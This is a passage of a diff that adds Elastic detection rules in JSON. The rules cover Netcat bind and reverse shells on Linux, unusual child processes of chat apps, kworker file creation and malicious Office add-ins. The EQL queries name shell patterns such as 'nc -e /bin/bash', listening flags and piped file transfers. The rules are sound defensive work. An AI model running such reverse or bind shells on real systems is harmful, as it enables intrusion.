user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes.\n\n### False positive analysis\n\n- Netcat is a dual-use tool that can be used for benign or malicious activity. It is included in some Linux distributions, so its presence is not necessarily suspicious. Some normal use of this program, while uncommon, may originate from scripts, automation tools, and frameworks.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Block the identified indicators of compromise (IoCs).\n- Take actions to terminate processes and connections used by the attacker.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by process.entity_id\n [process where host.os.type == \"linux\" and event.type == \"start\" and\n process.name:(\"nc\",\"ncat\",\"netcat\",\"netcat.openbsd\",\"netcat.traditional\") and (\n /* bind shell to echo for command execution */\n (process.args:(\"-l\",\"-p\") and process.args:(\"-c\",\"echo\",\"$*\"))\n /* bind shell to specific port */\n or process.args:(\"-l\",\"-p\",\"-lp\")\n /* reverse shell to command-line interpreter used for command execution */\n or (process.args:(\"-e\") and process.args:(\"/bin/bash\",\"/bin/sh\"))\n /* file transfer via stdout */\n or process.args:(\">\",\"<\")\n /* file transfer via pipe */\n or (process.args:(\"|\") and process.args:(\"nc\",\"ncat\"))\n )]\n [network where host.os.type == \"linux\" and (process.name == \"nc\" or process.name == \"ncat\" or process.name == \"netcat\" or\n process.name == \"netcat.openbsd\" or process.name == \"netcat.traditional\")]\n", + "references": [ + "http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", + "https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf", + "https://en.wikipedia.org/wiki/Netcat", + "https://www.hackers-arise.com/hacking-fundamentals", + "https://null-byte.wonderhowto.com/how-to/hack-like-pro-use-netcat-swiss-army-knife-hacking-tools-0148657/", + "https://levelup.gitconnected.com/ethical-hacking-part-15-netcat-nc-and-netcat-f6a8f7df43fd" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "adb961e0-cb74-42a0-af9e-29fc41f88f5f", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 110 + }, + "id": "adb961e0-cb74-42a0-af9e-29fc41f88f5f_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/adbfa3ee-777e-4747-b6b0-7bd645f30880_3.json b/packages/security_detection_engine/kibana/security_rule/adbfa3ee-777e-4747-b6b0-7bd645f30880_3.json new file mode 100644 index 00000000000..0ab930c7c17 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/adbfa3ee-777e-4747-b6b0-7bd645f30880_3.json @@ -0,0 +1,136 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies suspicious child processes of communications apps, which can indicate a potential masquerading as the communication app or the exploitation of a vulnerability on the application causing it to execute code.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Communication App Child Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (\n /* Slack */\n (process.parent.name : \"slack.exe\" and not\n (\n (\n process.executable : (\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Island\\\\Island\\\\Application\\\\Island.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Zoom\\\\bin*\\\\Zoom.exe\",\n \"?:\\\\Windows\\\\System32\\\\rundll32.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Mozilla Firefox\\\\firefox.exe\",\n \"?:\\\\Windows\\\\System32\\\\notepad.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\"\n ) and process.code_signature.trusted == true \n ) or\n (\n process.code_signature.subject_name : (\n \"Slack Technologies, Inc.\",\n \"Slack Technologies, LLC\"\n ) and process.code_signature.trusted == true\n ) or\n (\n (process.name : \"powershell.exe\" and process.command_line : \"powershell.exe -c Invoke-WebRequest -Uri https://slackb.com/*\") or\n (process.name : \"cmd.exe\" and process.command_line : \"C:\\\\WINDOWS\\\\system32\\\\cmd.exe /d /s /c \\\"%windir%\\\\System32\\\\rundll32.exe User32.dll,SetFocus 0\\\"\")\n )\n )\n ) or\n\n /* WebEx */\n (process.parent.name : (\"CiscoCollabHost.exe\", \"WebexHost.exe\") and not\n (\n (\n process.executable : (\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\"\n ) and process.code_signature.trusted == true \n ) or\n (\n process.code_signature.subject_name : (\n \"Cisco Systems, Inc.\",\n \"Cisco WebEx LLC\",\n \"Cisco Systems Inc.\"\n ) and process.code_signature.trusted == true\n )\n )\n ) or\n\n /* Teams */\n (process.parent.name : \"Teams.exe\" and not\n (\n (\n process.executable : (\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\BrowserCore\\\\BrowserCore.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Mozilla Firefox\\\\firefox.exe\"\n ) and process.code_signature.trusted == true \n ) or\n (\n process.code_signature.subject_name : (\n \"Microsoft Corporation\",\n \"Microsoft 3rd Party Application Component\"\n ) and process.code_signature.trusted == true\n ) or\n (\n (process.name : \"taskkill.exe\" and process.args : \"Teams.exe\")\n )\n )\n ) or\n\n /* Discord */\n (process.parent.name : \"Discord.exe\" and not\n (\n (\n process.executable : (\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Windows\\\\System32\\\\reg.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\reg.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\"\n ) and process.code_signature.trusted == true \n ) or\n (\n process.code_signature.subject_name : (\n \"Discord Inc.\"\n ) and process.code_signature.trusted == true\n ) or\n (\n process.name : \"cmd.exe\" and \n (\n process.command_line : (\n \"C:\\\\WINDOWS\\\\system32\\\\cmd.exe /d /s /c \\\"chcp\\\"\",\n \"C:\\\\WINDOWS\\\\system32\\\\cmd.exe /q /d /s /c \\\"C:\\\\Program^ Files\\\\NVIDIA^ Corporation\\\\NVSMI\\\\nvidia-smi.exe\\\"\"\n ) or\n process.args : (\n \"C:\\\\WINDOWS/System32/nvidia-smi.exe\",\n \"C:\\\\WINDOWS\\\\System32\\\\nvidia-smi.exe\"\n )\n )\n )\n )\n ) or\n\n /* WhatsApp */\n (process.parent.name : \"Whatsapp.exe\" and not\n (\n (\n process.executable : (\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\reg.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\reg.exe\"\n ) and process.code_signature.trusted == true \n ) or\n (\n process.code_signature.subject_name : (\n \"WhatsApp LLC\",\n \"WhatsApp, Inc\",\n \"24803D75-212C-471A-BC57-9EF86AB91435\"\n ) and process.code_signature.trusted == true\n ) or\n (\n (process.name : \"cmd.exe\" and process.command_line : \"C:\\\\Windows\\\\system32\\\\cmd.exe /d /s /c \\\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmic.exe*\")\n )\n )\n ) or\n\n /* Zoom */\n (process.parent.name : \"Zoom.exe\" and not\n (\n (\n process.executable : (\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Island\\\\Island\\\\Application\\\\Island.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Mozilla Firefox\\\\firefox.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\"\n ) and process.code_signature.trusted == true \n ) or\n (\n process.code_signature.subject_name : (\n \"Zoom Video Communications, Inc.\"\n ) and process.code_signature.trusted == true\n )\n )\n ) or\n\n /* Outlook */\n (process.parent.name : \"outlook.exe\" and not\n (\n (\n process.executable : (\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\system32\\\\wermgr.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\NewOutlookInstall\\\\NewOutlookInstaller.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Island\\\\Island\\\\Application\\\\Island.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Mozilla Firefox\\\\firefox.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Zoom\\\\bin\\\\Zoom.exe\",\n \"?:\\\\Windows\\\\System32\\\\IME\\\\SHARED\\\\IMEWDBLD.EXE\",\n \"?:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\prevhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\dwwin.exe\",\n \"?:\\\\Windows\\\\System32\\\\mspaint.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mspaint.exe\",\n \"?:\\\\Windows\\\\System32\\\\notepad.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\notepad.exe\",\n \"?:\\\\Windows\\\\System32\\\\smartscreen.exe\",\n \"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Windows\\\\splwow64.exe\"\n ) and process.code_signature.trusted == true \n )\n )\n ) or\n\n /* Thunderbird */\n (process.parent.name : \"thunderbird.exe\" and not\n (\n (\n process.executable : (\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\splwow64.exe\"\n ) and process.code_signature.trusted == true \n ) or\n (\n process.code_signature.subject_name : (\n \"Mozilla Corporation\"\n ) and process.code_signature.trusted == true\n )\n )\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "adbfa3ee-777e-4747-b6b0-7bd645f30880", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Rule Type: BBR", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.001", + "name": "Invalid Code Signature", + "reference": "https://attack.mitre.org/techniques/T1036/001/" + }, + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + }, + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1554", + "name": "Compromise Client Software Binary", + "reference": "https://attack.mitre.org/techniques/T1554/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "adbfa3ee-777e-4747-b6b0-7bd645f30880_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ae343298-97bc-47bc-9ea2-5f2ad831c16e_3.json b/packages/security_detection_engine/kibana/security_rule/ae343298-97bc-47bc-9ea2-5f2ad831c16e_3.json new file mode 100644 index 00000000000..fe0c05ad9e6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ae343298-97bc-47bc-9ea2-5f2ad831c16e_3.json @@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for a file creation event originating from a kworker parent process. kworker, or kernel worker, processes are part of the kernel's workqueue mechanism. They are responsible for executing work that has been scheduled to be done in kernel space, which might include tasks like handling interrupts, background activities, and other kernel-related tasks. Attackers may attempt to evade detection by masquerading as a kernel worker process.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious File Creation via Kworker", + "note": "## Triage and analysis\n\n### Investigating Suspicious File Creation via Kworker\n\nKworker, or kernel worker, processes are part of the kernel's workqueue mechanism. They are responsible for executing work that has been scheduled to be done in kernel space, which might include tasks like handling interrupts, background activities, and other kernel-related tasks.\n\nAttackers may attempt to evade detection by masquerading as a kernel worker process.\n\nThis rule monitors for suspicious file creation events through the kworker process. This is not common, and could indicate malicious behaviour.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE path = {{file.path}}\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator that performed these actions for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious Kworker UID Elevation - 7dfaaa17-425c-4fe7-bd36-83705fde7c2b\n- Network Activity Detected via Kworker - 25d917c4-aa3c-4111-974c-286c0312ff95\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where event.action in (\"creation\", \"file_create_event\") and process.name : \"kworker*\" and not (\n (process.name : \"kworker*kcryptd*\") or \n (file.path : (\"/var/log/*\", \"/var/crash/*\", \"/var/run/*\", \"/var/lib/systemd/coredump/*\", \"/var/spool/*\"))\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ae343298-97bc-47bc-9ea2-5f2ad831c16e", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1014", + "name": "Rootkit", + "reference": "https://attack.mitre.org/techniques/T1014/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "ae343298-97bc-47bc-9ea2-5f2ad831c16e_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_4.json b/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_4.json new file mode 100644 index 00000000000..f4488de327e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_4.json @@ -0,0 +1,134 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies execution of common Microsoft Office applications to launch an Office Add-In from a suspicious path or with an unusual parent process. This may indicate an attempt to get initial access via a malicious phishing MS Office Add-In.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Execution via Microsoft Office Add-Ins", + "query": "process where \n \n host.os.type == \"windows\" and event.type == \"start\" and \n \n process.name : (\"WINWORD.EXE\", \"EXCEL.EXE\", \"POWERPNT.EXE\", \"MSACCESS.EXE\", \"VSTOInstaller.exe\") and \n \n process.args regex~ \"\"\".+\\.(wll|xll|ppa|ppam|xla|xlam|vsto)\"\"\" and \n \n /* Office Add-In from suspicious paths */\n (process.args :\n (\"?:\\\\Users\\\\*\\\\Temp\\\\7z*\",\n \"?:\\\\Users\\\\*\\\\Temp\\\\Rar$*\",\n \"?:\\\\Users\\\\*\\\\Temp\\\\Temp?_*\",\n \"?:\\\\Users\\\\*\\\\Temp\\\\BNZ.*\",\n \"?:\\\\Users\\\\*\\\\Downloads\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\*\",\n \"?:\\\\Users\\\\Public\\\\*\",\n \"?:\\\\ProgramData\\\\*\",\n \"?:\\\\Windows\\\\Temp\\\\*\",\n \"\\\\Device\\\\*\",\n \"http*\") or\n\t \n process.parent.name : (\"explorer.exe\", \"OpenWith.exe\") or \n \n /* Office Add-In from suspicious parent */\n process.parent.name : (\"cmd.exe\", \"powershell.exe\")) and\n\t \n /* False Positives */\n not (process.args : \"*.vsto\" and\n process.parent.executable :\n (\"?:\\\\Program Files\\\\Logitech\\\\LogiOptions\\\\PlugInInstallerUtility*.exe\",\n \"?:\\\\ProgramData\\\\Logishrd\\\\LogiOptions\\\\Plugins\\\\VSTO\\\\*\\\\VSTOInstaller.exe\",\n \"?:\\\\Program Files\\\\Logitech\\\\LogiOptions\\\\PlugInInstallerUtility.exe\",\n \"?:\\\\Program Files\\\\LogiOptionsPlus\\\\PlugInInstallerUtility*.exe\",\n \"?:\\\\ProgramData\\\\Logishrd\\\\LogiOptionsPlus\\\\Plugins\\\\VSTO\\\\*\\\\VSTOInstaller.exe\",\n \"?:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\VSTO\\\\*\\\\VSTOInstaller.exe\")) and\n not (process.args : \"/Uninstall\" and process.name : \"VSTOInstaller.exe\") and\n not (process.parent.name : \"rundll32.exe\" and\n process.parent.args : \"?:\\\\WINDOWS\\\\Installer\\\\MSI*.tmp,zzzzInvokeManagedCustomActionOutOfProc\") and\n not (process.name : \"VSTOInstaller.exe\" and process.args : \"https://dl.getsidekick.com/outlook/vsto/Sidekick.vsto\")\n", + "references": [ + "https://github.com/Octoberfest7/XLL_Phishing", + "https://labs.f-secure.com/archive/add-in-opportunities-for-office-persistence/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, 